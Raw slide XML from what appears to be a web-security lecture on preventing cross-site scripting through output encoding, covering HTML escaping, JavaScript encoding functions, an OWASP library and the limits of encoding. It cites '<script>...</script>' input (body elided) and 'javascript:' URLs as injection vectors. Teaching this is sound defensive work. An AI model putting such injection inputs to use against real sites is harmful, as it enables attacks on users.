          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Escaping the user input so that the browser interprets it only as data not as code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>‘&lt;‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>‘&gt;’  &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="3025814"/>
            <a:ext cx="8378371" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screenshot 2019-04-11 at 16.16.4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800" y="3198125"/>
            <a:ext cx="3581400" cy="1320800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4748069"/>
            <a:ext cx="8686801" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If the user input were the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, the resulting HTML would be as follows:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screenshot 2019-04-11 at 16.1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1149" y="5363634"/>
            <a:ext cx="3746500" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45032318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Encoding in client-side and server-side code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Client-side code: JavaScript language has built-in functions that encode data for different contexts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="3025814"/>
            <a:ext cx="8378371" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screenshot 2019-04-11 at 16.16.4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800" y="3198125"/>
            <a:ext cx="3581400" cy="1320800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4748069"/>
            <a:ext cx="8686801" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If the user input were the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, the resulting HTML would be as follows:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screenshot 2019-04-11 at 16.1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1149" y="5363634"/>
            <a:ext cx="3746500" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147213905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Reform Library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Provides a solid set of functions for encoding output for the most common context targets in web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="3025814"/>
            <a:ext cx="8378371" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screenshot 2019-04-11 at 16.16.4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800" y="3198125"/>
            <a:ext cx="3581400" cy="1320800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4748069"/>
            <a:ext cx="8686801" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If the user input were the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, the resulting HTML would be as follows:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screenshot 2019-04-11 at 16.1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1149" y="5363634"/>
            <a:ext cx="3746500" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418496" y="2512675"/>
            <a:ext cx="8268304" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Category:OWASP_Encoding_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32760507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Limitations of Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Instinctively, it might seem that XSS can be prevented by encoding or validating all user input as soon as your website receives it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="2847624"/>
            <a:ext cx="8378371" cy="3877985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…However the input can be inserted into several contexts in a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>There is no easy way of determining when user input arrives which context it will eventually be inserted into.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>he same user input needs to be inserted into different context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Outbound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>input handling can take into account the specific context that user input will be inserted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>into.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207770094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Encoding on the Client Side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screenshot 2019-04-11 at 16.31.0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334" y="2286000"/>
            <a:ext cx="8382000" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript provides several built-in methods and properties that automatically encode all data in a context </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>aware manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355653914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Limitations of Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308429" y="1271488"/>
            <a:ext cx="8378371" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>It will still be possible to input malicious strings in certain contexts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screenshot 2019-04-11 at 16.36.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150533"/>
            <a:ext cx="5562600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460829" y="2880154"/>
            <a:ext cx="8378371" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This does not prevent the attacker from inserting a URL beginning with “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”. When the link is clicked, whatever JavaScript is embedded inside the URL will be executed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4598561"/>
            <a:ext cx="8378371" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Inadequate when you want the user to customize part of the HTML page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460829" y="5657672"/>
            <a:ext cx="8378371" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In such situations encoding needs to be complemented with validation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5280045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XSS Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="downloa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495" y="1501273"/>
            <a:ext cx="1391430" cy="1391430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="2892703"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757333" y="2523371"/>
            <a:ext cx="2150534" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="downlo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2495" y="4040715"/>
            <a:ext cx="1293283" cy="1293283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772495" y="5333998"/>
            <a:ext cx="1391430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163925" y="2336800"/>
